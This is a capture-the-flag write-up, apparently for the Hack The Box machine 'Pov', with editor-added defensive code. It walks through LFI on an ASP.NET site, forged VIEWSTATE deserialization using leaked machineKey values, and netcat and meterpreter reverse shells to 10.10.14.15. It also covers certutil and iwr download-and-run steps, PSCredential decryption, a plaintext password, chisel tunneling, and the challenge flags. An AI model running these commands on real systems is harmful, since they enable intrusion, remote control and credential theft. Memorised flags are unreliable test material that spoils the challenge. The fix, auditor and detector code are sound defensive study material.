
Nmap Results
# Nmap 7.94SVN scan initiated Tue Jan 30 16:24:53 2024 as: nmap -Pn -p- -sT --min-rate 5000 -A -oN nmap.txt 10.10.11.251
Nmap scan report for 10.10.11.251
Host is up (0.014s latency).
Not shown: 65534 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: pov.htb
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019 (88%)
Aggressive OS guesses: Microsoft Windows Server 2019 (88%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
TRACEROUTE (using proto 1/icmp)
HOP RTT ADDRESS
1 13.98 ms 10.10.14.1
2 14.12 ms 10.10.11.251
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Jan 30 16:25:35 2024 -- 1 IP address (1 host up) scanned in 42.09 seconds
Service Enumeration
TCP/80
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: pov.htb
We can see that the default page on the target web server has a title of pov.htb. Let's add that to our /etc/hosts file.
echo '10.10.11.251 pov.htb' | sudo tee -a /etc/hosts
Gobuster Enumeration
Directories and Files
gobuster dir -u http://pov.htb -w /usr/share/seclists/Discovery/Web-Content/big.txt -x html,aspx,php,txt -o gobuster-80.txt -t 100
/Index.html (Status: 200) [Size: 12330]
/css (Status: 301) [Size: 142] [--> http://pov.htb/css/]
/img (Status: 301) [Size: 142] [--> http://pov.htb/img/]
/index.html (Status: 200) [Size: 12330]
/js (Status: 301) [Size: 141] [--> http://pov.htb/js/]
Virtual Hosts
# --exclude-length 334 : silence HTTP 400
gobuster vhost -k --domain pov.htb --append-domain -u http://10.10.11.251 -w /usr/share/dnsrecon/subdomains-top1mil.txt -t 100 -o vhost.txt --exclude-length 334
Found: dev.pov.htb Status: 302 [Size: 152] [--> http://dev.pov.htb/portfolio/]
dev.pov.htb
echo '10.10.11.251 dev.pov.htb' | sudo tee -a /etc/hosts
Add this hostname to our hosts file

On the contact.aspx page, there is a form that makes an HTTP POST request to itself. Not sure if this is exploitable yet.

More Directory and File Enumeration
# Ignore 302,404 responses
gobuster dir -u http://dev.pov.htb/portfolio -w /usr/share/seclists/Discovery/Web-Content/big.txt -x html,aspx,php,txt -o gobuster-80-dev.txt -t 100 -b 302,404
/Contact.aspx (Status: 200) [Size: 4691]
/Default.aspx (Status: 200) [Size: 21371]
/assets (Status: 301) [Size: 159] [--> http://dev.pov.htb/portfolio/assets/]
/contact.aspx (Status: 200) [Size: 4691]
/default.aspx (Status: 200) [Size: 21371]

If we try to navigate to http://dev.pov.htb/portfolio/assets, the web server redirects us to http://dev.pov.htb:8080.
Testing the Download Function

Clicking the Download CV button invokes a __doPostBack JavaScript event of download and uses the file name cv.pdf by default.


I got really lucky with my guess that the cv.pdf file is stored at the root of the directory.

The Download CV button is just pulling the cv.pdf file from this directory. Looking at my Burp request history, I notice there are other files in the /portfolio/ directory we can test with. It should be possible to download them by simply modifying the file= parameter in the POST request.
Let's see if we can download any of the above files from the server. The procedure will go like this:
- Turn on Burp intercept
- Click the Download CV button
- Change the cv.pdf filename to default.aspx
- Check and see if we got the page source code






Additional Download Tests

This is the last request for the file download I just sent in Burp. Right-click the request and choose Send to Repeater.

In the source code we downloaded above, we noted the CodeFile=index.aspx.cs attribute, which names the file holding the server-side code for the default.aspx page. Let's take a look at that file. In Repeater, change &file=default.aspx to &file=index.aspx.cs and click Run.

Nice! We are able to read the C# code that runs server-side when we load the page initially or interact with the Download event listener. There is a bit of user-input sanitization on the file= parameter as well, which wasn't a problem for us, as we used backslashes.
Let's take a look at contact.aspx and do the same thing. Load the page source, then load the server-side source.


Excellent! We can see the server-side code that will run when we load the page or submit information in the contact form.
Absolute paths also worked flawlessly without any special tricks, e.g. &file=C:\Windows\System32\drivers\etc\hosts.

Relative paths worked as well; that is how I found the config file for the dev.pov.htb host: &file=..\web.config.

I even found that I can capture the sfitz user's NetNTLMv2 hash by running impacket-smbserver and specifying &file=\\kali_vpn_ip\share_name\file_name.



I also tried creating reverse .aspx and web.config shells but had no luck getting a reverse shell when specifying &file=\\10.10.14.15\evil\file_name, even with other TCP ports specified.
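The download handler above fails because it filters characters instead of checking where the final path ends up: backslashes, absolute paths, ..\ and UNC names all get past it. The following is an added example of the check a fixed handler should do, written by the editor, not code from this box or from the original post. It canonicalizes the requested name against an assumed site root (C:\inetpub\wwwroot\portfolio is a guess, not the real path), enforces containment, and only then applies an extension allowlist so that page source such as default.aspx is never served. It uses ntpath so the Windows path rules are reproduced even when you run it on Linux.

```python
import ntpath

# Assumed on-disk location of the portfolio site (not taken from the target).
DOWNLOAD_ROOT = r"C:\inetpub\wwwroot\portfolio"
# The only document types the Download CV button is meant to hand out.
ALLOWED_EXTENSIONS = {".pdf"}


def resolve_download(requested, root=DOWNLOAD_ROOT):
    """Return the canonical on-disk path for a requested download, or None when the
    request would leave the download directory or asks for a disallowed file type."""
    # Windows file names can never contain ':' or NUL, so a request carrying them is
    # a drive letter (C:\...) or an alternate data stream (cv.pdf::$DATA), never a file
    # we intend to serve.
    if not requested or "\x00" in requested or ":" in requested:
        return None
    # IIS/Windows treat "/" and "\" alike, so normalise before doing anything else.
    # A rooted (\dir\file) or UNC (\\host\share\file) name makes ntpath.join discard
    # the root; the containment check below then rejects the result.
    candidate = ntpath.normpath(ntpath.join(root, requested.replace("/", "\\")))
    # NTFS is case-insensitive, so compare lower-cased, and require the separator so
    # that "...\portfolio2\x" is not mistaken for a child of "...\portfolio".
    prefix = ntpath.normpath(root).lower().rstrip("\\") + "\\"
    if not candidate.lower().startswith(prefix):
        return None
    # Inside the directory is not enough: source files live there too.
    if ntpath.splitext(candidate)[1].lower() not in ALLOWED_EXTENSIONS:
        return None
    return candidate


if __name__ == "__main__":
    # The exact values this writeup sent through the file= parameter.
    for name in ("cv.pdf", "default.aspx", r"..\web.config",
                 r"C:\Windows\System32\drivers\etc\hosts", r"\\10.10.14.15\share\file"):
        print(f"{name!r:45} -> {resolve_download(name)}")
```

The order matters: canonicalize first, then check containment, then check the extension. Checking the extension on the raw string would let a name like `..\web.config\..\cv.pdf` through, and a blocklist of characters is exactly what the original handler tried. On a real IIS host, do the same with Path.GetFullPath in the page's C# and keep the downloadable documents in a directory that holds nothing else.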
Exploit
VIEWSTATE Deserialization with Secrets
I prodded the file system as much as I could with the LFI vulnerability, but came to a dead end. As any good security researcher would do, I took the information I'd gathered until now and searched Google for potential exploits, such as:
- Response.TransmitFile() exploitability
- Response.AppendHeader() exploitability
However, it was this search that ultimately opened the door to code execution:


The HackTricks page advises using the ysoserial.exe binary to generate a serialized VIEWSTATE payload that the server will deserialize. In this case we know the encryption secrets, as we have access to the web.config file.
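The whole attack hinges on the machineKey in web.config being static and readable: with the validationKey the server's own MAC check is satisfied, so the forged VIEWSTATE is accepted. As an added, defender-side example (the editor's code, not part of this writeup or of ysoserial), the script below audits a web.config for exactly the conditions that made this possible. The two config fragments are constructed; the key values are placeholders, not the keys from the box.

```python
import xml.etree.ElementTree as ET

# Constructed web.config in the layout ASP.NET uses; the keys are placeholders.
LEAKED_STYLE_CONFIG = """<configuration>
  <system.web>
    <compilation targetFramework="4.8" />
    <machineKey validationKey="PLACEHOLDER_VALIDATION_KEY_HEX"
                decryptionKey="PLACEHOLDER_DECRYPTION_KEY_HEX"
                validation="SHA1" decryption="AES" />
  </system.web>
</configuration>"""

# The same site with auto-generated, per-application keys and a modern MAC.
HARDENED_CONFIG = """<configuration>
  <system.web>
    <compilation targetFramework="4.8" />
    <machineKey validationKey="AutoGenerate,IsolateApps"
                decryptionKey="AutoGenerate,IsolateApps"
                validation="HMACSHA256" decryption="AES" />
  </system.web>
</configuration>"""

# MAC algorithms that should no longer be used for ViewState validation.
WEAK_VALIDATION = {"MD5", "SHA1"}


def audit_machine_key(config_xml):
    """Return a list of findings about the <machineKey> element of a web.config."""
    findings = []
    root = ET.fromstring(config_xml)
    # iter() rather than an XPath avoids the "system.web" tag with a dot in it.
    mk = next(root.iter("machineKey"), None)
    if mk is None:
        # No element means the runtime default: auto-generated keys kept out of the file.
        return findings
    for attr in ("validationKey", "decryptionKey"):
        value = mk.get(attr, "AutoGenerate,IsolateApps")
        if not value.startswith("AutoGenerate"):
            findings.append(f"{attr} is hard-coded in web.config: anyone who can read this "
                            f"file can forge __VIEWSTATE, so rotate it if the file is ever exposed")
    validation = mk.get("validation", "HMACSHA256")
    if validation.upper() in WEAK_VALIDATION:
        findings.append(f"validation={validation} is a weak MAC; use HMACSHA256 or stronger")
    if mk.get("enableViewStateMac", "true").lower() == "false":
        findings.append("enableViewStateMac=false: __VIEWSTATE is accepted without any MAC check")
    return findings


if __name__ == "__main__":
    for label, cfg in (("leaked-style", LEAKED_STYLE_CONFIG), ("hardened", HARDENED_CONFIG)):
        print(label, audit_machine_key(cfg) or "no findings")
```

Static keys are legitimate in a web farm, where every node must produce the same MAC, so the first finding is less "remove this" than "treat web.config as a secret and rotate the keys the moment it leaks". On a box like this one, the LFI that exposed web.config and the forged VIEWSTATE that followed are the same incident.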
You can run the ysoserial tool on a Windows VM, on your Windows host, or under Wine on Kali. I'm going to do it the Wine way, because I like pain.
Installing Wine Dependencies
sudo dpkg --add-architecture i386
sudo apt update
sudo apt install -y wine wine32:i386 winetricks mono-complete
Installing Wine-Mono
First, check the installed version of wine by running wine --version. In the screenshot below, you'll see I have version 8.0.1.

Next, we should consult the wine-mono version table here:


I am not at version 8.9, but my version is greater than 7.20, so we should install wine-mono version 7.4.0.
wget https://dl.winehq.org/wine/wine-mono/7.4.0/wine-mono-7.4.0-x86.msi
wine uninstaller
If you get the error wine: could not load kernel32.dll, status c0000135, just run rm -rf ~/.wine/. Then re-run wine uninstaller.

Install .NET Libraries
winetricks dotnet48
Generating the Serialized Payload
wget https://github.com/pwntester/ysoserial.net/releases/download/v1.36/ysoserial-1dba9c4416ba6e79b6b262b758fa75e2ee9008e9.zip -O ysoserial.zip
unzip -d ysoserial ysoserial.zip
cd ysoserial/Release
We'll be referencing the example command here to generate the payload.

# LD_PRELOAD= : an empty variable assignment to silence some errors on my host
# 2>/dev/null : because wine was creating some weird error output that interfered with the payload
# sed 's/\n//g' : join on line breaks, not sure if wine is creating them (note that sed works one line at a time, so tr -d '\n' is the reliable way to strip them)
LD_PRELOAD= wine ./ysoserial.exe -p ViewState -g TextFormattingRunProperties \
-c "ping 10.10.14.15" \
--path="/portfolio/default.aspx" --apppath="/" \
--decryptionalg="AES" \
--decryptionkey="74477CEBDD09D66A4D4A8C8B5082A4CF9A15BE54A94F6F80D5E822F347183B43" \
--validationalg="SHA1" \
--validationkey="5620D3D029F914F4CDF25869D24EC2DA517435B200CCF1ACFA1EDE22213BECEB55BA3CF576813C3301FCB07018E605E7B7872EEACE791AAD71A267BC16633468" 2>/dev/null | sed 's/\n//g'
Weaponizing the Payload
Go into your Burp proxy settings and turn Intercept on.

Click the Download CV button.

Note that the request is intercepted and held by Burp. Highlight the value of the VIEWSTATE parameter all the way up to the first & (ampersand).

Overwrite the contents of the VIEWSTATE parameter with the payload you generated. Recall that the command I used in the example is ping 10.10.14.15, so I'm going to have the target ping my Kali VPN IP.

Go back into Burp and press the Forward button.

Note that I used tcpdump to listen for ICMP traffic on my tun0 interface; you can see the incoming ICMP echo request packets from 10.10.11.251 (the target's IP address).

Getting a Reverse Shell
Transfer nc.exe to the Target
cp /usr/share/windows-resources/binaries/nc.exe .
sudo python3 -m http.server 80
Copy 'nc.exe' to the current directory and host it over HTTP
LD_PRELOAD= wine ./ysoserial.exe -p ViewState -g TextFormattingRunProperties \
-c "certutil.exe -urlcache -split -f http://10.10.14.15/nc.exe C:\Windows\Temp\nc.exe" \
--path="/portfolio/default.aspx" --apppath="/" \
--decryptionalg="AES" \
--decryptionkey="74477CEBDD09D66A4D4A8C8B5082A4CF9A15BE54A94F6F80D5E822F347183B43" \
--validationalg="SHA1" \
--validationkey="5620D3D029F914F4CDF25869D24EC2DA517435B200CCF1ACFA1EDE22213BECEB55BA3CF576813C3301FCB07018E605E7B7872EEACE791AAD71A267BC16633468" 2>/dev/null | sed 's/\n//g'
Generate the VIEWSTATE payload

Trigger a Reverse Shell
sudo rlwrap nc -lnvp 443
Start a listener on your chosen TCP port
LD_PRELOAD= wine ./ysoserial.exe -p ViewState -g TextFormattingRunProperties \
-c "C:\Windows\Temp\nc.exe 10.10.14.15 443 -e powershell.exe" \
--path="/portfolio/default.aspx" --apppath="/" \
--decryptionalg="AES" \
--decryptionkey="74477CEBDD09D66A4D4A8C8B5082A4CF9A15BE54A94F6F80D5E822F347183B43" \
--validationalg="SHA1" \
--validationkey="5620D3D029F914F4CDF25869D24EC2DA517435B200CCF1ACFA1EDE22213BECEB55BA3CF576813C3301FCB07018E605E7B7872EEACE791AAD71A267BC16633468" 2>/dev/null | sed 's/\n//g'
Generate the VIEWSTATE payload
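Every command sent through the forged VIEWSTATE (the ping, the certutil download and the nc.exe shell) runs as a child of the IIS worker process, which is the one thing a defender can key on regardless of how the payload got in. The following is an added example by the editor, not code from this writeup or from any tool it uses: a small detection pass over constructed Sysmon-style process-creation records (fields named after Sysmon Event ID 1, but every PID, path and record here is made up) that rebuilds the process tree and flags shells and LOLBins descending from w3wp.exe, download helpers on the command line, and app-pool processes executing from a Temp directory.

```python
import ntpath

# Constructed Sysmon-style (Event ID 1) process-creation records modelling the
# command chains the forged __VIEWSTATE produced on this box:
# w3wp.exe -> cmd.exe -> ping / certutil / nc.exe. PIDs and paths are made up; the
# user name is the one whoami reported.
SAMPLE_EVENTS = [
    {"ProcessId": 1000, "ParentProcessId": 612, "User": "IIS APPPOOL\\dev",
     "Image": "C:\\Windows\\System32\\inetsrv\\w3wp.exe", "CommandLine": "w3wp.exe -ap dev"},
    # Benign: ASP.NET compiling a page, a normal child of the worker process.
    {"ProcessId": 1500, "ParentProcessId": 1000, "User": "IIS APPPOOL\\dev",
     "Image": "C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe",
     "CommandLine": "csc.exe /noconfig /fullpaths"},
    {"ProcessId": 2104, "ParentProcessId": 1000, "User": "IIS APPPOOL\\dev",
     "Image": "C:\\Windows\\System32\\cmd.exe", "CommandLine": "cmd /c \"ping 10.10.14.15\""},
    {"ProcessId": 2110, "ParentProcessId": 2104, "User": "IIS APPPOOL\\dev",
     "Image": "C:\\Windows\\System32\\PING.EXE", "CommandLine": "ping 10.10.14.15"},
    {"ProcessId": 2200, "ParentProcessId": 1000, "User": "IIS APPPOOL\\dev",
     "Image": "C:\\Windows\\System32\\cmd.exe",
     "CommandLine": "cmd /c \"certutil.exe -urlcache -split -f http://10.10.14.15/nc.exe C:\\Windows\\Temp\\nc.exe\""},
    {"ProcessId": 2208, "ParentProcessId": 2200, "User": "IIS APPPOOL\\dev",
     "Image": "C:\\Windows\\System32\\certutil.exe",
     "CommandLine": "certutil.exe -urlcache -split -f http://10.10.14.15/nc.exe C:\\Windows\\Temp\\nc.exe"},
    {"ProcessId": 2300, "ParentProcessId": 1000, "User": "IIS APPPOOL\\dev",
     "Image": "C:\\Windows\\System32\\cmd.exe",
     "CommandLine": "cmd /c \"C:\\Windows\\Temp\\nc.exe 10.10.14.15 443 -e powershell.exe\""},
    {"ProcessId": 2308, "ParentProcessId": 2300, "User": "IIS APPPOOL\\dev",
     "Image": "C:\\Windows\\Temp\\nc.exe", "CommandLine": "C:\\Windows\\Temp\\nc.exe 10.10.14.15 443 -e powershell.exe"},
    {"ProcessId": 2316, "ParentProcessId": 2308, "User": "IIS APPPOOL\\dev",
     "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell.exe"},
    # Benign: an interactive user running ping from Explorer (parent not in the sample).
    {"ProcessId": 3000, "ParentProcessId": 900, "User": "POV\\alaading",
     "Image": "C:\\Windows\\System32\\PING.EXE", "CommandLine": "ping 10.10.10.2"},
]

WEB_WORKER = "w3wp.exe"
# Children w3wp.exe legitimately spawns (dynamic compilation); anything else under it is worth a look.
EXPECTED_WORKER_CHILDREN = {"csc.exe", "vbc.exe", "cvtres.exe", "conhost.exe"}
# Command-line fragments typical of living-off-the-land downloads.
DOWNLOAD_MARKERS = ("-urlcache", "/transfer", "downloadstring", "downloadfile", "invoke-webrequest")


def image_name(path):
    return ntpath.basename(path).lower()


def ancestor_names(event, by_pid):
    """Walk ParentProcessId links and return the ancestors' image names, nearest first."""
    names, pid, seen = [], event["ParentProcessId"], set()
    while pid in by_pid and pid not in seen:  # `seen` guards against PID-reuse loops
        seen.add(pid)
        parent = by_pid[pid]
        names.append(image_name(parent["Image"]))
        pid = parent["ParentProcessId"]
    return names


def detect(events):
    """Return (ProcessId, image name, [reasons]) for every event that trips a rule."""
    by_pid = {e["ProcessId"]: e for e in events}
    alerts = []
    for e in events:
        name = image_name(e["Image"])
        cmdline = e["CommandLine"].lower()
        reasons = []
        if WEB_WORKER in ancestor_names(e, by_pid) and name not in EXPECTED_WORKER_CHILDREN:
            reasons.append("descendant of w3wp.exe")
        if any(marker in cmdline for marker in DOWNLOAD_MARKERS):
            reasons.append("download via LOLBin")
        if "\\temp\\" in e["Image"].lower() and e["User"].lower().startswith("iis apppool\\"):
            reasons.append("app pool executing from Temp")
        if reasons:
            alerts.append((e["ProcessId"], name, reasons))
    return alerts


if __name__ == "__main__":
    for pid, name, reasons in detect(SAMPLE_EVENTS):
        print(f"pid {pid:<5} {name:<16} {', '.join(reasons)}")
```

The ancestry walk is what makes this robust: ysoserial's gadget goes through cmd.exe, so a rule that only looks at the immediate parent of ping.exe or nc.exe would see cmd.exe and miss the web worker two levels up. In Sysmon terms the same logic maps onto ParentImage conditions plus a correlation on ParentProcessGuid.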

Post-Exploit Enumeration
Operating Environment
OS & Kernel
Host Name: POV
OS Name: Microsoft Windows Server 2019 Standard
OS Version: 10.0.17763 N/A Build 17763
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00429-00521-62775-AA076
Original Install Date: 10/26/2023, 1:01:55 PM
System Boot Time: 2/2/2024, 6:46:50 PM
System Manufacturer: VMware, Inc.
System Model: VMware7,1
System Type: x64-based PC
Processor(s): 2 Processor(s) Installed.
[01]: Intel64 Family 6 Model 85 Stepping 7 GenuineIntel ~2295 Mhz
[02]: Intel64 Family 6 Model 85 Stepping 7 GenuineIntel ~2295 Mhz
BIOS Version: VMware, Inc. VMW71.00V.16707776.B64.2008070230, 8/7/2020
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (UTC-08:00) Pacific Time (US & Canada)
Total Physical Memory: 4,095 MB
Available Physical Memory: 3,296 MB
Virtual Memory: Max Size: 4,799 MB
Virtual Memory: Available: 4,029 MB
Virtual Memory: In Use: 770 MB
Page File Location(s): C:\pagefile.sys
Domain: WORKGROUP
Logon Server: N/A
Hotfix(s): N/A
Network Card(s): 1 NIC(s) Installed.
[01]: vmxnet3 Ethernet Adapter
Connection Name: Ethernet0 2
DHCP Enabled: No
IP address(es)
[01]: 10.10.11.251
[02]: fe80::4666:410:2b2c:7069
[03]: dead:beef::4d88:e9c:6f0c:4b61
[04]: dead:beef::a9
Hyper-V Requirements: A hypervisor has been detected. Features required for Hyper-V will not be displayed.
Current User
USER INFORMATION
----------------
User Name SID
========= =============================================
pov\sfitz S-1-5-21-2506154456-4081221362-271687478-1000
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
====================================== ================ ============================================================= ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\BATCH Well-known group S-1-5-3 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account Well-known group S-1-5-113 Mandatory group, Enabled by default, Enabled group
BUILTIN\IIS_IUSRS Alias S-1-5-32-568 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
IIS APPPOOL\dev Well-known group S-1-5-82-781516728-2844361489-696272565-2378874797-2530480757 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label S-1-16-8192
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== ========
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
Users and Groups
Local Users
User accounts for \\POV
-------------------------------------------------------------------------------
Administrator alaading DefaultAccount
Guest sfitz WDAGUtilityAccount
The command completed successfully.
Local Groups
*Access Control Assistance Operators
*Administrators
*Backup Operators
*Certificate Service DCOM Access
*Cryptographic Operators
*Device Owners
*Distributed COM Users
*Event Log Readers
*Guests
*Hyper-V Administrators
*IIS_IUSRS
*Network Configuration Operators
*Performance Log Users
*Performance Monitor Users
*Power Users
*Print Operators
*RDS Endpoint Servers
*RDS Management Servers
*RDS Remote Access Servers
*Remote Desktop Users
*Remote Management Users
*Replicator
*Storage Replica Administrators
*System Managed Accounts Group
*Users
Network Configurations
Network Interfaces
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . : htb
IPv6 Address. . . . . . . . . . . : dead:beef::a9
IPv6 Address. . . . . . . . . . . : dead:beef::4d88:e9c:6f0c:4b61
Link-local IPv6 Address . . . . . : fe80::4666:410:2b2c:7069%4
IPv4 Address. . . . . . . . . . . : 10.10.11.251
Subnet Mask . . . . . . . . . . . : 255.255.254.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:89e0%4
10.10.10.2
Open Ports
localaddress localport
------------ ---------
:: 49668
:: 49667
:: 49666
:: 49665
:: 49664
:: 47001
:: 5985
:: 445
:: 135
:: 80
0.0.0.0 49668
0.0.0.0 49667
0.0.0.0 49666
0.0.0.0 49665
0.0.0.0 49664
10.10.11.251 139
0.0.0.0 135
Interesting Files
C:\Users\sfitz\Documents\connection.xml
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
<Obj RefId="0">
<TN RefId="0">
<T>System.Management.Automation.PSCredential</T>
<T>System.Object</T>
</TN>
<ToString>System.Management.Automation.PSCredential</ToString>
<Props>
<S N="UserName">alaading</S>
<SS N="Password">[DPAPI-protected SecureString blob omitted]</SS>
</Props>
</Obj>
</Objs>
Privilege Escalation
Lateral to Alaading
In the post-exploit enumeration section, we came across the C:\Users\sfitz\Documents\connection.xml file, which on inspection is a PowerShell PSCredential object stored in CliXml format (the output of Export-Clixml).
I'm already running a PowerShell reverse shell, so I should be able to import the credential object and reveal the plaintext password with ease.
$cred = Import-Clixml C:\Users\sfitz\Documents\connection.xml
$cred.GetNetworkCredential().Username
$cred.GetNetworkCredential().Password
You may also have noticed in the post-exploit enumeration that tcp/5985 is open in the listening ports. It is definitely blocked by the Windows firewall, as it wasn't exposed in our initial nmap scan. We can use chisel to forward this port.
wget https://github.com/jpillora/chisel/releases/download/v1.9.1/chisel_1.9.1_windows_amd64.gz -O chisel.exe.gz
wget https://github.com/jpillora/chisel/releases/download/v1.9.1/chisel_1.9.1_linux_amd64.gz -O chisel.gz
gunzip chisel.exe.gz
gunzip chisel.gz
chmod u+x chisel
sudo python3 -m http.server 80
Download the binaries and host them over HTTP
cd C:\Windows\Temp
iwr http://10.10.14.15/chisel.exe -o chisel.exe
Download to the target

sudo ./chisel server --port 8081 --reverse &
Start chisel in server mode on Kali
$scriptBlock = { Start-Process C:\Windows\Temp\chisel.exe -ArgumentList @('client','10.10.14.15:8081','R:5985:127.0.0.1:5985') }
Start-Job -ScriptBlock $scriptBlock
Start chisel in client mode as a background job on the target

evil-winrm -i 127.0.0.1 -u 'alaading' -p 'f8gQ8fynP44ek1m3'
Connect to the target through the chisel tunnel

Running as alaading, we repeat the post-exploit enumeration process.
Alternative Lateral to Alaading

- Transfer RunasCs.exe to the target
- Start a TCP listener
- Run the command to connect to the TCP listener with alaading's credentials
sudo rlwrap nc -lvnp 443
Start the listener
.\RunasCs.exe 'alaading' 'f8gQ8fynP44ek1m3' 'powershell.exe' -r 10.10.14.15:443
Spawn the process and redirect it to the listener

Escalate to Administrator
I tried to abuse the SeDebugPrivilege given to this user account to achieve NT AUTHORITY\SYSTEM or Administrator without meterpreter. I was able to dump lsass using procdump, but the Administrator didn't have a cached session. Other techniques were also fruitless.
Metasploit
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=10.10.14.15 LPORT=443 -f exe -o sh.exe
Create the meterpreter payload
sudo msfconsole
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set LHOST tun0
msf6 exploit(multi/handler) > set LPORT 443
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter_reverse_tcp
msf6 exploit(multi/handler) > run
Start MSF, then use and configure the exploit handler
sudo python3 -m http.server 80
Serve the meterpreter payload over HTTP
iwr http://10.10.14.15/sh.exe -o sh.exe
.\sh.exe
Download and run the file

meterpreter > migrate -N lsass.exe
Flags
User
6554d872ca302f4e5c7c31ac06f8f638
Root
8f5b63e0cff832f141a776127bb09758

